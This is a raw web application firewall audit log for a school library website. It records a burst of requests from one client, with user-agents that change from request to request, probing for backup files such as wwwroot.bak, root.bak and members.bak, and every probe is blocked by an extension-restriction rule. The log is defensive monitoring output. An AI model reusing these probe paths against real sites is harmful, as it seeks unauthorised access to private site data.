Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97ff5955-Z-- --0afe0e40-A-- [18/May/2025:11:50:56 +0700] aClnMEPRqak7bVuUS6cSogAAAII 103.236.140.4 56272 103.236.140.4 8181 --0afe0e40-B-- GET /wwwroot.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 OPR/50.0.2762.58 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 119144460 --0afe0e40-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --0afe0e40-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856236683 12308 (- - -) Stopwatch2: 1747543856236683 12308; combined=874, p1=404, p2=424, p3=0, p4=0, p5=46, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0afe0e40-Z-- --9f565e7b-A-- [18/May/2025:11:50:56 +0700] aClnMBir-GlPrFVVKe5ErgAAAEk 103.236.140.4 56252 103.236.140.4 8181 --9f565e7b-B-- GET /2024.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153354252 --9f565e7b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9f565e7b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856243238 6566 (- - -) Stopwatch2: 1747543856243238 6566; combined=3879, p1=3438, p2=403, p3=0, p4=0, p5=38, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f565e7b-Z-- --8763a90c-A-- [18/May/2025:11:50:56 +0700] aClnMBir-GlPrFVVKe5EtQAAAFA 103.236.140.4 56220 103.236.140.4 8181 --8763a90c-B-- GET /bak.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.80 Safari/537.36 OPR/56.0.3051.116 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 123775199 --8763a90c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8763a90c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856248712 2178 (- - -) Stopwatch2: 1747543856248712 2178; combined=815, p1=391, p2=389, p3=0, p4=0, p5=34, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8763a90c-Z-- --316f7120-A-- [18/May/2025:11:50:56 +0700] aClnMEPRqak7bVuUS6cStAAAAJE 103.236.140.4 56674 103.236.140.4 8181 --316f7120-B-- GET /web.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626 Safari/537.36 OPR/56.0.3051.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 117360828 --316f7120-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --316f7120-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856252129 4427 (- - -) Stopwatch2: 1747543856252129 4427; combined=940, p1=488, p2=409, p3=0, p4=0, p5=42, sr=100, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --316f7120-Z-- --3adbec56-A-- [18/May/2025:11:50:56 +0700] aClnMPypzAd0elWOk7o8ewAAABg 103.236.140.4 55596 103.236.140.4 8181 --3adbec56-B-- GET /root.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729 Safari/537.36 OPR/57.0.3098.106 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155975683 --3adbec56-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3adbec56-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856254117 5262 (- - -) Stopwatch2: 1747543856254117 5262; combined=1848, p1=457, p2=1357, p3=0, p4=0, p5=34, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3adbec56-Z-- --99666b2d-A-- [18/May/2025:11:50:56 +0700] aClnMFewLfDrCkDGIGxd3QAAAM0 103.236.140.4 56708 103.236.140.4 8181 --99666b2d-B-- GET /smkn22jakarta.sch.id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.137 Safari/537.36 OPR/50.0.2762.67 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151060495 --99666b2d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --99666b2d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856253495 8137 (- - -) Stopwatch2: 1747543856253495 8137; combined=1151, p1=681, p2=438, p3=0, p4=0, p5=31, sr=126, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99666b2d-Z-- --d0642c5d-A-- [18/May/2025:11:50:56 +0700] aClnMEPRqak7bVuUS6cStwAAAJU 103.236.140.4 56736 103.236.140.4 8181 --d0642c5d-B-- GET /back.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36 OPR/54.0.2952.60 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 151420937 --d0642c5d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d0642c5d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856254833 11722 (- - -) Stopwatch2: 1747543856254833 11722; combined=1224, p1=798, p2=388, p3=0, p4=0, p5=37, sr=485, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0642c5d-Z-- --f8fedb72-A-- [18/May/2025:11:50:56 +0700] aClnMFewLfDrCkDGIGxd2gAAAMY 103.236.140.4 56702 103.236.140.4 8181 --f8fedb72-B-- GET /2017.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 155713548 --f8fedb72-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f8fedb72-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856253478 13269 (- - -) Stopwatch2: 1747543856253478 13269; combined=6842, p1=418, p2=6388, p3=0, p4=0, p5=36, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8fedb72-Z-- --a26d330c-A-- [18/May/2025:11:50:56 +0700] aClnMBir-GlPrFVVKe5EwQAAAEA 103.236.140.4 56738 103.236.140.4 8181 --a26d330c-B-- GET /faisunzip.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 OPR/56.0.3051.52 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 83165205 --a26d330c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a26d330c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856257522 9395 (- - -) Stopwatch2: 1747543856257522 9395; combined=769, p1=457, p2=275, p3=0, p4=0, p5=36, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a26d330c-Z-- --9e53ec14-A-- [18/May/2025:11:50:56 +0700] aClnMPypzAd0elWOk7o8gQAAAAQ 103.236.140.4 53908 103.236.140.4 8181 --9e53ec14-B-- GET /user.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0 Safari/537.36 OPR/58.0.3135.127 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 152961036 --9e53ec14-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9e53ec14-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856259369 7677 (- - -) Stopwatch2: 1747543856259369 7677; combined=917, p1=442, p2=444, p3=0, p4=0, p5=31, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e53ec14-Z-- --a331fc6f-A-- [18/May/2025:11:50:56 +0700] aClnMEPRqak7bVuUS6cSswAAAII 103.236.140.4 56198 103.236.140.4 8181 --a331fc6f-B-- GET /smkn22jakarta.sch.id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 154337292 --a331fc6f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a331fc6f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".sch.id.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856249349 17858 (- - -) Stopwatch2: 1747543856249349 17858; combined=8237, p1=466, p2=492, p3=0, p4=0, p5=7278, sr=109, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a331fc6f-Z-- --19683864-A-- [18/May/2025:11:50:56 +0700] aClnMFewLfDrCkDGIGxd4gAAANg 103.236.140.4 54330 103.236.140.4 8181 --19683864-B-- GET /members.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1; rv:60.2.0) Gecko/20100101 Firefox/60.2.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153485324 --19683864-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --19683864-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543856245182 22218 (- - -) Stopwatch2: 1747543856245182 22218; combined=909, p1=444, p2=432, p3=0, p4=0, p5=33, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --19683864-Z-- --4382530c-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8hQAAAAM 103.236.140.4 56796 103.236.140.4 8181 --4382530c-B-- GET /backups.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 156303368 --4382530c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --4382530c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882077320 2592 (- - -) Stopwatch2: 1747543882077320 2592; combined=907, p1=426, p2=450, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4382530c-Z-- --77a6854e-A-- [18/May/2025:11:51:22 +0700] aClnSvypzAd0elWOk7o8hwAAABU 103.236.140.4 56796 103.236.140.4 8181 --77a6854e-B-- GET /clients.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 156303378 --77a6854e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --77a6854e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882094488 2892 (- - -) Stopwatch2: 1747543882094488 2892; combined=964, p1=465, p2=468, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77a6854e-Z-- --9f0ac449-A-- [18/May/2025:11:51:22 +0700] aClnShir-GlPrFVVKe5ExwAAAE8 103.236.140.4 56832 103.236.140.4 8181 --9f0ac449-B-- GET /home.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.81 Safari/537.36 OPR/55.0.2994.47 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190418 --9f0ac449-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --9f0ac449-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882097383 2007 (- - -) Stopwatch2: 1747543882097383 2007; combined=767, p1=359, p2=381, p3=0, p4=0, p5=26, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f0ac449-Z-- --1a02bc78-A-- [18/May/2025:11:51:22 +0700] aClnShir-GlPrFVVKe5EygAAAFY 103.236.140.4 56832 103.236.140.4 8181 --1a02bc78-B-- GET /1.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0.3) Gecko/20100101 Firefox/59.0.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 153190460 --1a02bc78-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1a02bc78-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747543882138075 1986 (- - -) Stopwatch2: 1747543882138075 1986; combined=735, p1=372, p2=336, p3=0, p4=0, p5=27, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
